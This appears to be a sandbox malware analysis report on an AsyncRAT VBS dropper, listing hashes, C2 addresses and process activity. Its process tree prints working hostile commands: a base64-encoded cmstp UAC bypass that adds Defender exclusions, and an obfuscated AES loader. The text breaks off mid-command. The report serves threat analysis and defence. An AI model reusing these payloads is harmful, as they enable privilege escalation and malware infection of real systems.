asyncrat | 41e24d66f8bb13b08c6a41c4b4a2cbd52056edd2a17bec6f30fe3838db6d1f2d

Analysis

max time kernel
149s
max time network
151s
platform
windows10-2004_x64
resource
win10v2004-20241007-en
resource tags

arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
submitted
28-12-2024 00:01

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

UH6AS_4698_output.vbs
Size

203KB
MD5

4b6a750839856ab620fbdfc0250b3efd
SHA1

95474dd9bcf969c408911fa7500dc3ccc6416596
SHA256

41e24d66f8bb13b08c6a41c4b4a2cbd52056edd2a17bec6f30fe3838db6d1f2d
SHA512

0ce01f73301a57ca6dfacd135705f8662ba2cdd390da4afb0f9af27135f494da93d24fe5489a92de0f50766c63cef6b13db1095751f4c9f22f52d7aad87f8357
SSDEEP

1536:abfH0Kj6qf7ANcXh5/vLQbFj7zy4XGCeehA5ID0ZG5xwzA7nogV6EAmqZlJ2B:a7H0Kj6iEij49XGCecA25qgoOilJo

Score

10^/10

asyncrat default discovery execution rat

Malware Config

Extracted

Family

asyncrat

Version

0.5.8

Botnet

Default

87.120.113.125:2101

87.120.113.125:55644

Mutex

E0GLVPl3iUqi

Attributes

delay
3
install
false
install_file
winserve.exe
install_folder
%AppData%

aes.plain

Signatures

AsyncRat
AsyncRAT is designed to remotely monitor and control other computers written in C#.
rat asyncrat
Asyncrat family
asyncrat

Async RAT payload 1 IoCs

rat

resource	yara_rule
behavioral2/memory/2956-122-0x00000000062E0000-0x00000000062F2000-memory.dmp	family_asyncrat

Blocklisted process makes network request 3 IoCs

flow	pid	Process
40	2956	powershell.exe
47	2956	powershell.exe
48	2956	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 5 IoCs

Run Powershell and hide display window.

execution

PowerShell

T1059.001

pid	Process
2144	powershell.exe
2668	powershell.exe
1700	powershell.exe
1196	powershell.exe
2956	powershell.exe

Checks computer location settings 2 TTPs 2 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation	WScript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation	WScript.exe

Drops file in System32 directory 1 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\%AppData%\Microsoft\Windows\Start Menu\Programs\Windows PowerShell\Windows PowerShell.lnk	powershell.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 5 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WScript.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe

Kills process with taskkill 1 IoCs

evasion

pid	Process
3192	taskkill.exe

Modifies registry class 1 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000_Classes\Local Settings	powershell.exe

Suspicious behavior: EnumeratesProcesses 10 IoCs

pid	Process
2144	powershell.exe
2144	powershell.exe
2668	powershell.exe
2668	powershell.exe
1700	powershell.exe
1700	powershell.exe
1196	powershell.exe
1196	powershell.exe
2956	powershell.exe
2956	powershell.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	2144	powershell.exe
Token: SeDebugPrivilege	2668	powershell.exe
Token: SeDebugPrivilege	3192	taskkill.exe
Token: SeDebugPrivilege	1700	powershell.exe
Token: SeDebugPrivilege	1196	powershell.exe
Token: SeIncreaseQuotaPrivilege	1196	powershell.exe
Token: SeSecurityPrivilege	1196	powershell.exe
Token: SeTakeOwnershipPrivilege	1196	powershell.exe
Token: SeLoadDriverPrivilege	1196	powershell.exe
Token: SeSystemProfilePrivilege	1196	powershell.exe
Token: SeSystemtimePrivilege	1196	powershell.exe
Token: SeProfSingleProcessPrivilege	1196	powershell.exe
Token: SeIncBasePriorityPrivilege	1196	powershell.exe
Token: SeCreatePagefilePrivilege	1196	powershell.exe
Token: SeBackupPrivilege	1196	powershell.exe
Token: SeRestorePrivilege	1196	powershell.exe
Token: SeShutdownPrivilege	1196	powershell.exe
Token: SeDebugPrivilege	1196	powershell.exe
Token: SeSystemEnvironmentPrivilege	1196	powershell.exe
Token: SeRemoteShutdownPrivilege	1196	powershell.exe
Token: SeUndockPrivilege	1196	powershell.exe
Token: SeManageVolumePrivilege	1196	powershell.exe
Token: 33	1196	powershell.exe
Token: 34	1196	powershell.exe
Token: 35	1196	powershell.exe
Token: 36	1196	powershell.exe
Token: SeIncreaseQuotaPrivilege	1196	powershell.exe
Token: SeSecurityPrivilege	1196	powershell.exe
Token: SeTakeOwnershipPrivilege	1196	powershell.exe
Token: SeLoadDriverPrivilege	1196	powershell.exe
Token: SeSystemProfilePrivilege	1196	powershell.exe
Token: SeSystemtimePrivilege	1196	powershell.exe
Token: SeProfSingleProcessPrivilege	1196	powershell.exe
Token: SeIncBasePriorityPrivilege	1196	powershell.exe
Token: SeCreatePagefilePrivilege	1196	powershell.exe
Token: SeBackupPrivilege	1196	powershell.exe
Token: SeRestorePrivilege	1196	powershell.exe
Token: SeShutdownPrivilege	1196	powershell.exe
Token: SeDebugPrivilege	1196	powershell.exe
Token: SeSystemEnvironmentPrivilege	1196	powershell.exe
Token: SeRemoteShutdownPrivilege	1196	powershell.exe
Token: SeUndockPrivilege	1196	powershell.exe
Token: SeManageVolumePrivilege	1196	powershell.exe
Token: 33	1196	powershell.exe
Token: 34	1196	powershell.exe
Token: 35	1196	powershell.exe
Token: 36	1196	powershell.exe
Token: SeIncreaseQuotaPrivilege	1196	powershell.exe
Token: SeSecurityPrivilege	1196	powershell.exe
Token: SeTakeOwnershipPrivilege	1196	powershell.exe
Token: SeLoadDriverPrivilege	1196	powershell.exe
Token: SeSystemProfilePrivilege	1196	powershell.exe
Token: SeSystemtimePrivilege	1196	powershell.exe
Token: SeProfSingleProcessPrivilege	1196	powershell.exe
Token: SeIncBasePriorityPrivilege	1196	powershell.exe
Token: SeCreatePagefilePrivilege	1196	powershell.exe
Token: SeBackupPrivilege	1196	powershell.exe
Token: SeRestorePrivilege	1196	powershell.exe
Token: SeShutdownPrivilege	1196	powershell.exe
Token: SeDebugPrivilege	1196	powershell.exe
Token: SeSystemEnvironmentPrivilege	1196	powershell.exe
Token: SeRemoteShutdownPrivilege	1196	powershell.exe
Token: SeUndockPrivilege	1196	powershell.exe
Token: SeManageVolumePrivilege	1196	powershell.exe

Suspicious use of WriteProcessMemory 25 IoCs

description	pid	Process	procid_target
PID 4860 wrote to memory of 2144	4860	WScript.exe	83
PID 4860 wrote to memory of 2144	4860	WScript.exe	83
PID 2144 wrote to memory of 4732	2144	powershell.exe	86
PID 2144 wrote to memory of 4732	2144	powershell.exe	86
PID 4732 wrote to memory of 208	4732	csc.exe	87
PID 4732 wrote to memory of 208	4732	csc.exe	87
PID 2144 wrote to memory of 640	2144	powershell.exe	88
PID 2144 wrote to memory of 640	2144	powershell.exe	88
PID 4860 wrote to memory of 696	4860	WScript.exe	110
PID 4860 wrote to memory of 696	4860	WScript.exe	110
PID 696 wrote to memory of 1700	696	cmd.exe	112
PID 696 wrote to memory of 1700	696	cmd.exe	112
PID 696 wrote to memory of 1700	696	cmd.exe	112
PID 1700 wrote to memory of 1196	1700	powershell.exe	113
PID 1700 wrote to memory of 1196	1700	powershell.exe	113
PID 1700 wrote to memory of 1196	1700	powershell.exe	113
PID 1700 wrote to memory of 4784	1700	powershell.exe	117
PID 1700 wrote to memory of 4784	1700	powershell.exe	117
PID 1700 wrote to memory of 4784	1700	powershell.exe	117
PID 4784 wrote to memory of 4060	4784	WScript.exe	118
PID 4784 wrote to memory of 4060	4784	WScript.exe	118
PID 4784 wrote to memory of 4060	4784	WScript.exe	118
PID 4060 wrote to memory of 2956	4060	cmd.exe	120
PID 4060 wrote to memory of 2956	4060	cmd.exe	120
PID 4060 wrote to memory of 2956	4060	cmd.exe	120

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\UH6AS_4698_output.vbs"
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:4860
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -WindowStyle Hidden -Command Invoke-Expression ([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('ZnVuY3Rpb24gcmFuZG9tWFlaLUludm9rZS1VQUMgewoKCnBhcmFtKAogICAgW1BhcmFtZXRlcihNYW5kYXRvcnkgPSAkdHJ1ZSldCiAgICBbc3RyaW5nXSRyYW5kb21YWVpFeGVjdXRhYmxlLAogCiAgICBbUGFyYW1ldGVyKCldCiAgICBbc3RyaW5nXSRyYW5kb21YWVpDb21tYW5kCikKCiRyYW5kb21YWVpJbmZEYXRhID0gQCcKW3ZlcnNpb25dClNpZ25hdHVyZT0kY2hpY2FnbyQKQWR2YW5jZWRJTkY9Mi41CgpbRGVmYXVsdEluc3RhbGxdCkN1c3RvbURlc3RpbmF0aW9uPXJhbmRvbVhZWi1DdXN0SW5zdERlc3RTZWN0aW9uQWxsVXNlcnMKUnVuUHJlU2V0dXBDb21tYW5kcz1yYW5kb21YWVotUnVuUHJlU2V0dXBDb21tYW5kc1NlY3Rpb24KCltyYW5kb21YWVotUnVuUHJlU2V0dXBDb21tYW5kc1NlY3Rpb25dCkxJTkUKdGFza2tpbGwgL0lNIGNtc3RwLmV4ZSAvRgoKW3JhbmRvbVhZWi1DdXN0SW5zdERlc3RTZWN0aW9uQWxsVXNlcnNdCjQ5MDAwLDQ5MDAxPXJhbmRvbVhZWi1BbGxVU2VyX0xESURTZWN0aW9uLCA3CgpbcmFuZG9tWFlaLUFsbFVTZXJfTERJRFNlY3Rpb25dCiJIS0xNIiwgIlNPRlRXQVJFXE1pY3Jvc29mdFxXaW5kb3dzXEN1cnJlbnRWZXJzaW9uXEFwcCBQYXRoc1xDTU1HUjMyLkVYRSIsICJQcm9maWxlSW5zdGFsbFBhdGgiLCAiJVVuZXhwZWN0ZWRFcnJvciUiLCAiIgoKW1N0cmluZ3NdClNlcnZpY2VOYW1lPSJyYW5kb21YWVpWUE4iClNob3J0U3ZjTmFtZT0icmFuZG9tWFlaVlBOIgonQAoKJHJhbmRvbVhZWkNvZGUgPSBAIgp1c2luZyBTeXN0ZW07CnVzaW5nIFN5c3RlbS5UaHJlYWRpbmc7CnVzaW5nIFN5c3RlbS5UZXh0Owp1c2luZyBTeXN0ZW0uSU87CnVzaW5nIFN5c3RlbS5EaWFnbm9zdGljczsKdXNpbmcgU3lzdGVtLkNvbXBvbmVudE1vZGVsOwp1c2luZyBTeXN0ZW0uUnVudGltZS5JbnRlcm9wU2VydmljZXM7CgpwdWJsaWMgY2xhc3MgcmFuZG9tWFlaQ01TVFBCeXBhc3MKewogICAgW0RsbEltcG9ydCgiU2hlbGwzMi5kbGwiLCBDaGFyU2V0ID0gQ2hhclNldC5BdXRvLCBTZXRMYXN0RXJyb3IgPSB0cnVlKV0KICAgIHN0YXRpYyBleHRlcm4gSW50UHRyIFNoZWxsRXhlY3V0ZShJbnRQdHIgaHduZCwgc3RyaW5nIGxwT3BlcmF0aW9uLCBzdHJpbmcgbHBGaWxlLCBzdHJpbmcgbHBQYXJhbWV0ZXJzLCBzdHJpbmcgbHBEaXJlY3RvcnksIGludCBuU2hvd0NtZCk7CgogICAgW0RsbEltcG9ydCgidXNlcjMyLmRsbCIpXQogICAgc3RhdGljIGV4dGVybiBJbnRQdHIgRmluZFdpbmRvdyhzdHJpbmcgbHBDbGFzc05hbWUsIHN0cmluZyBscFdpbmRvd05hbWUpOwoKICAgIFtEbGxJbXBvcnQoInVzZXIzMi5kbGwiKV0KICAgIHN0YXRpYyBleHRlcm4gYm9vbCBQb3N0TWVzc2FnZShJbnRQdHIgaFduZCwgdWludCBNc2csIGludCB3UGFyYW0sIGludCBsUGFyYW0pOwoKICAgIHB1YmxpYyBzdGF0aWMgc3RyaW5nIEJpbmFyeVBhdGggPSAiYzpcXHdpbmRvd3NcXHN5c3RlbTMyXFxjbXN0cC5leGUiOwoKICAgIHB1YmxpYyBzdGF0aWMgc3RyaW5nIFNldEluZkZpbGUoc3RyaW5nIENvbW1hbmRUb0V4ZWN1dGUsIHN0cmluZyBJbmZEYXRhKQogICAgewogICAgICAgIFN0cmluZ0J1aWxkZXIgT3V0cHV0RmlsZSA9IG5ldyBTdHJpbmdCdWlsZGVyKCk7CiAgICAgICAgT3V0cHV0RmlsZS5BcHBlbmQoIkM6XFx3aW5kb3dzXFx0ZW1wIik7CiAgICAgICAgT3V0cHV0RmlsZS5BcHBlbmQoIlxcIik7CiAgICAgICAgT3V0cHV0RmlsZS5BcHBlbmQoUGF0aC5HZXRSYW5kb21GaWxlTmFtZSgpLlNwbGl0KENvbnZlcnQuVG9DaGFyKCIuIikpWzBdKTsKICAgICAgICBPdXRwdXRGaWxlLkFwcGVuZCgiLmluZiIpOwogICAgICAgIFN0cmluZ0J1aWxkZXIgbmV3SW5mRGF0YSA9IG5ldyBTdHJpbmdCdWlsZGVyKEluZkRhdGEpOwogICAgICAgIG5ld0luZkRhdGEuUmVwbGFjZSgiTElORSIsIENvbW1hbmRUb0V4ZWN1dGUpOwogICAgICAgIEZpbGUuV3JpdGVBbGxUZXh0KE91dHB1dEZpbGUuVG9TdHJpbmcoKSwgbmV3SW5mRGF0YS5Ub1N0cmluZygpKTsKICAgICAgICByZXR1cm4gT3V0cHV0RmlsZS5Ub1N0cmluZygpOwogICAgfQoKICAgIHB1YmxpYyBzdGF0aWMgYm9vbCByYW5kb21YWVpFeGVjdXRlKHN0cmluZyBDb21tYW5kVG9FeGVjdXRlLCBzdHJpbmcgSW5mRGF0YSkKICAgIHsKICAgICAgICBjb25zdCBpbnQgV01fU1lTS0VZRE9XTiA9IDB4MDEwMDsKICAgICAgICBjb25zdCBpbnQgVktfUkVUVVJOID0gMHgwRDsKCiAgICAgICAgU3RyaW5nQnVpbGRlciBJbmZGaWxlID0gbmV3IFN0cmluZ0J1aWxkZXIoKTsKICAgICAgICBJbmZGaWxlLkFwcGVuZChTZXRJbmZGaWxlKENvbW1hbmRUb0V4ZWN1dGUsIEluZkRhdGEpKTsKCiAgICAgICAgUHJvY2Vzc1N0YXJ0SW5mbyBzdGFydEluZm8gPSBuZXcgUHJvY2Vzc1N0YXJ0SW5mbyhCaW5hcnlQYXRoKTsKICAgICAgICBzdGFydEluZm8uQXJndW1lbnRzID0gIi9hdSAiICsgSW5mRmlsZS5Ub1N0cmluZygpOwogICAgICAgIHN0YXJ0SW5mby5XaW5kb3dTdHlsZSA9IFByb2Nlc3NXaW5kb3dTdHlsZS5IaWRkZW47ICAvLyBIaWRkZW4gd2luZG93CiAgICAgICAgSW50UHRyIGRwdHIgPSBNYXJzaGFsLkFsbG9jSEdsb2JhbCgxKTsKICAgICAgICBTaGVsbEV4ZWN1dGUoZHB0ciwgIiIsIEJpbmFyeVBhdGgsIHN0YXJ0SW5mby5Bcmd1bWVudHMsICIiLCAwKTsKCiAgICAgICAgVGhyZWFkLlNsZWVwKDMwMDApOwogICAgICAgIEludFB0ciBXaW5kb3dUb0ZpbmQgPSBGaW5kV2luZG93KG51bGwsICJyYW5kb21YWVpWUE4iKTsKCiAgICAgICAgUG9zdE1lc3NhZ2UoV2luZG93VG9GaW5kLCBXTV9TWVNLRVlET1dOLCBWS19SRVRVUk4sIDApOwogICAgICAgIFRocmVhZC5TbGVlcCg1MDAwKTsKICAgICAgICBGaWxlLkRlbGV0ZShJbmZGaWxlLlRvU3RyaW5nKCkpOwogICAgICAgIHJldHVybiB0cnVlOwogICAgfQp9CiJACgokcmFuZG9tWFlaQ29uc2VudFByb21wdCA9IChHZXQtSXRlbVByb3BlcnR5IEhLTE06XFNPRlRXQVJFXE1pY3Jvc29mdFxXaW5kb3dzXEN1cnJlbnRWZXJzaW9uXFBvbGljaWVzXFN5c3RlbSkuQ29uc2VudFByb21wdEJlaGF2aW9yQWRtaW4KJHJhbmRvbVhZWlNlY3VyZURlc2t0b3BQcm9tcHQgPSAoR2V0LUl0ZW1Qcm9wZXJ0eSBIS0xNOlxTT0ZUV0FSRVxNaWNyb3NvZnRcV2luZG93c1xDdXJyZW50VmVyc2lvblxQb2xpY2llc1xTeXN0ZW0pLlByb21wdE9uU2VjdXJlRGVza3RvcAppZiAoJHJhbmRvbVhZWkNvbnNlbnRQcm9tcHQgLUVxIDIgLWFuZCAkcmFuZG9tWFlaU2VjdXJlRGVza3RvcFByb21wdCAtRXEgMSkgewogICAgcmV0dXJuCn0KCnRyeSB7CiAgICAkcmFuZG9tWFlaVXNlciA9IFtTeXN0ZW0uU2VjdXJpdHkuUHJpbmNpcGFsLldpbmRvd3NJZGVudGl0eV06OkdldEN1cnJlbnQoKS5OYW1lCiAgICAkcmFuZG9tWFlaQWRtID0gR2V0LUxvY2FsR3JvdXBNZW1iZXIgLVNJRCBTLTEtNS0zMi01NDQgfCBXaGVyZS1PYmplY3QgeyAkXy5OYW1lIC1lcSAkcmFuZG9tWFlaVXNlciB9Cn0gY2F0Y2ggewogICAgJHJhbmRvbVhZWlVzZXIgPSBbU3lzdGVtLlNlY3VyaXR5LlByaW5jaXBhbC5XaW5kb3dzSWRlbnRpdHldOjpHZXRDdXJyZW50KCkuTmFtZQogICAgJHJhbmRvbVhZWkFkbWluR3JvdXBTSUQgPSAnUy0xLTUtMzItNTQ0JwogICAgJHJhbmRvbVhZWkFkbWluR3JvdXAgPSBHZXQtV21pT2JqZWN0IC1DbGFzcyBXaW4zMl9Hcm91cCB8IFdoZXJlLU9iamVjdCB7ICRfLlNJRCAtZXEgJHJhbmRvbVhZWkFkbWluR3JvdXBTSUQgfQogICAgJHJhbmRvbVhZWk1lbWJlcnMgPSAkcmFuZG9tWFlaQWRtaW5Hcm91cC5HZXRSZWxhdGVkKCJXaW4zMl9Vc2VyQWNjb3VudCIpCiAgICAkcmFuZG9tWFlaTWVtYmVycyB8IEZvckVhY2gtT2JqZWN0IHsgaWYgKCRfLkNhcHRpb24gLWVxICRyYW5kb21YWVpVc2VyKSB7ICRyYW5kb21YWVpBZG0gPSAkdHJ1ZSB9IH0KfQoKaWYgKCEkcmFuZG9tWFlaQWRtKSB7CiAgICByZXR1cm4KfQoKdHJ5IHsKICAgIGlmICghW1N5c3RlbS5JTy5GaWxlXTo6RXhpc3RzKCRyYW5kb21YWVpFeGVjdXRhYmxlKSkgewogICAgICAgICRyYW5kb21YWVpFeCA9IChHZXQtQ29tbWFuZCAkcmFuZG9tWFlaRXhlY3V0YWJsZSkKICAgICAgICBpZiAoIVtTeXN0ZW0uSU8uRmlsZV06OkV4aXN0cygkcmFuZG9tWFlaRXguU291cmNlKSkgewogICAgICAgICAgICAkcmFuZG9tWFlaRXhlY3V0YWJsZSA9ICRFeGVjdXRpb25Db250ZXh0LlNlc3Npb25TdGF0ZS5QYXRoLkdldFVucmVzb2x2ZWRQcm92aWRlclBhdGhGcm9tUFNQYXRoKCRyYW5kb21YWVpFeGVjdXRhYmxlKQogICAgICAgICAgICBpZiAoIVtTeXN0ZW0uSU8uRmlsZV06OkV4aXN0cygkcmFuZG9tWFlaRXhlY3V0YWJsZSkpIHsKICAgICAgICAgICAgICAgIHJldHVybgogICAgICAgICAgICB9CiAgICAgICAgfSBlbHNlIHsKICAgICAgICAgICAgJHJhbmRvbVhZWkV4ZWN1dGFibGUgPSAoR2V0LUNvbW1hbmQgJHJhbmRvbVhZWkV4ZWN1dGFibGUpLk5hbWUKICAgICAgICB9CiAgICB9Cn0gY2F0Y2ggewogICAgcmV0dXJuCn0KCmlmICgkcmFuZG9tWFlaRXhlY3V0YWJsZS5Db250YWlucygicG93ZXJzaGVsbCIpKSB7CiAgICBpZiAoJHJhbmRvbVhZWkNvbW1hbmQgLW5lICIiKSB7CiAgICAgICAgJHJhbmRvbVhZWkZpbmFsID0gInBvd2Vyc2hlbGwgLVdpbmRvd1N0eWxlIEhpZGRlbiAtYyAiIiRyYW5kb21YWVpDb21tYW5kIiIiCiAgICB9IGVsc2UgewogICAgICAgICRyYW5kb21YWVpGaW5hbCA9ICIkcmFuZG9tWFlaRXhlY3V0YWJsZSAkcmFuZG9tWFlaQ29tbWFuZCIKICAgIH0KfSBlbHNlaWYgKCRyYW5kb21YWVpFeGVjdXRhYmxlLkNvbnRhaW5zKCJjbWQiKSkgewogICAgaWYgKCRyYW5kb21YWVpDb21tYW5kIC1uZSAiIikgewogICAgICAgICRyYW5kb21YWVpGaW5hbCA9ICJjbWQgL2MgIiIkcmFuZG9tWFlaQ29tbWFuZCIiIiAgIyBDaGFuZ2VkIHRvIC9jIHRvIGNsb3NlIHRoZSBjbWQgd2luZG93CiAgICB9IGVsc2UgewogICAgICAgICRyYW5kb21YWVpGaW5hbCA9ICIkcmFuZG9tWFlaRXhlY3V0YWJsZSAkcmFuZG9tWFlaQ29tbWFuZCIKICAgIH0KfSBlbHNlIHsKICAgICRyYW5kb21YWVpGaW5hbCA9ICIkcmFuZG9tWFlaRXhlY3V0YWJsZSAkcmFuZG9tWFlaQ29tbWFuZCIKfQoKZnVuY3Rpb24gcmFuZG9tWFlaRXhlY3V0ZSB7CiAgICB0cnkgewogICAgICAgICRyYW5kb21YWVpSZXN1bHQgPSBbcmFuZG9tWFlaQ01TVFBCeXBhc3NdOjpyYW5kb21YWVpFeGVjdXRlKCRyYW5kb21YWVpGaW5hbCwgJHJhbmRvbVhZWkluZkRhdGEpCiAgICB9IGNhdGNoIHsKICAgICAgICBBZGQtVHlwZSAkcmFuZG9tWFlaQ29kZQogICAgICAgICRyYW5kb21YWVpSZXN1bHQgPSBbcmFuZG9tWFlaQ01TVFBCeXBhc3NdOjpyYW5kb21YWVpFeGVjdXRlKCRyYW5kb21YWVpGaW5hbCwgJHJhbmRvbVhZWkluZkRhdGEpCiAgICB9CgogICAgaWYgKCRyYW5kb21YWVpSZXN1bHQpIHsKICAgICAgICByZXR1cm4KICAgIH0gZWxzZSB7CiAgICAgICAgcmV0dXJuCiAgICB9Cn0KCiRyYW5kb21YWVpQcm9jZXNzID0gKChHZXQtV21pT2JqZWN0IC1DbGFzcyB3aW4zMl9wcm9jZXNzKS5uYW1lIHwgU2VsZWN0LVN0cmluZyAiY21zdHAiIHwgU2VsZWN0LU9iamVjdCAqIC1GaXJzdCAxKS5QYXR0ZXJuCmlmICgkcmFuZG9tWFlaUHJvY2VzcyAtZXEgImNtc3RwIikgewogICAgdHJ5IHsKICAgICAgICBTdG9wLVByb2Nlc3MgLU5hbWUgImNtc3RwIiAtRm9yY2UKICAgICAgICByYW5kb21YWVpFeGVjdXRlCiAgICB9IGNhdGNoIHsKICAgICAgICByZXR1cm4KICAgIH0KfSBlbHNlIHsKICAgIHJhbmRvbVhZWkV4ZWN1dGUKfQp9CgojIEZ1bmN0aW9uIENhbGwKcmFuZG9tWFlaLUludm9rZS1VQUMgLXJhbmRvbVhZWkV4ZWN1dGFibGUgInBvd2Vyc2hlbGwiIC1yYW5kb21YWVpDb21tYW5kICIuKCdBZGQtTXBQJyArICdyZWZlcmVuY2UnKSAtRXhjbHVzaW9uUGF0aCBDOlwgLUV4Y2x1c2lvblByb2Nlc3MgcG93ZXJzaGVsbC5leGUi')))
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:2144
- - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
    "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\aqy2xwz4\aqy2xwz4.cmdline"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4732
  - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
      C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES8647.tmp" "c:\Users\Admin\AppData\Local\Temp\aqy2xwz4\CSC3EF4BD40A98448F4AEC7FE3D5CCC8648.TMP"
      4⤵
      PID:208
- - C:\windows\system32\cmstp.exe
    "C:\windows\system32\cmstp.exe" /au C:\windows\temp\nnua52se.inf
    3⤵
    PID:640
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\c.bat" "
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:696
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ IEX '#EspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNK '.Replace('Espaco', ''); $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Rr8+grcZJNGH203eeUxXpnDWX4hdpd2UTJfbowjN1dY='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('/21C5PLzK2uu1MqJwEaXWg=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ IEX '$bbKFI=New-Object System.IO.MOBFOBFUSCUDAemOBFOBFUSCUDAorOBFOBFUSCUDAySOBFOBFUSCUDAtrOBFOBFUSCUDAeaOBFOBFUSCUDAm(,$param_var);'.Replace('OBFOBFUSCUDA', ''); IEX '$tDIwH=New-Object System.IO.OBFOBFUSCUDAMOBFOBFUSCUDAeOBFOBFUSCUDAmOBFOBFUSCUDAoOBFOBFUSCUDArOBFOBFUSCUDAyOBFOBFUSCUDASOBFOBFUSCUDAtOBFOBFUSCUDArOBFOBFUSCUDAeOBFOBFUSCUDAaOBFOBFUSCUDAmOBFOBFUSCUDA;'.Replace('OBFOBFUSCUDA', ''); IEX '$FlJeX=New-Object System.IO.COBFOBFUSCUDAomOBFOBFUSCUDAprOBFOBFUSCUDAeOBFOBFUSCUDAssOBFOBFUSCUDAioOBFOBFUSCUDAn.OBFOBFUSCUDAGZOBFOBFUSCUDAipOBFOBFUSCUDAStOBFOBFUSCUDAreOBFOBFUSCUDAamOBFOBFUSCUDA($bbKFI, [IO.COBFOBFUSCUDAomOBFOBFUSCUDAprOBFOBFUSCUDAesOBFOBFUSCUDAsiOBFOBFUSCUDAonOBFOBFUSCUDA.CoOBFOBFUSCUDAmpOBFOBFUSCUDAreOBFOBFUSCUDAssOBFOBFUSCUDAiOBFOBFUSCUDAoOBFOBFUSCUDAnOBFOBFUSCUDAMode]::DOBFOBFUSCUDAeOBFOBFUSCUDAcOBFOBFUSCUDAompOBFOBFUSCUDAreOBFOBFUSCUDAss);'.Replace('OBFOBFUSCUDA', ''); $FlJeX.CopyTo($tDIwH); $FlJeX.Dispose(); $bbKFI.Dispose(); $tDIwH.Dispose(); $tDIwH.ToArray();}function execute_function($param_var,$param2_var){ IEX '$MjSwFSGHYBZqPaI=[System.ROBFOBFUSCUDAeOBFOBFUSCUDAflOBFOBFUSCUDAectOBFOBFUSCUDAioOBFOBFUSCUDAn.OBFOBFUSCUDAAsOBFOBFUSCUDAseOBFOBFUSCUDAmbOBFOBFUSCUDAlOBFOBFUSCUDAyOBFOBFUSCUDA]::LOBFOBFUSCUDAoOBFOBFUSCUDAaOBFOBFUSCUDAdOBFOBFUSCUDA([byte[]]$param_var);'.Replace('OBFOBFUSCUDA', ''); IEX 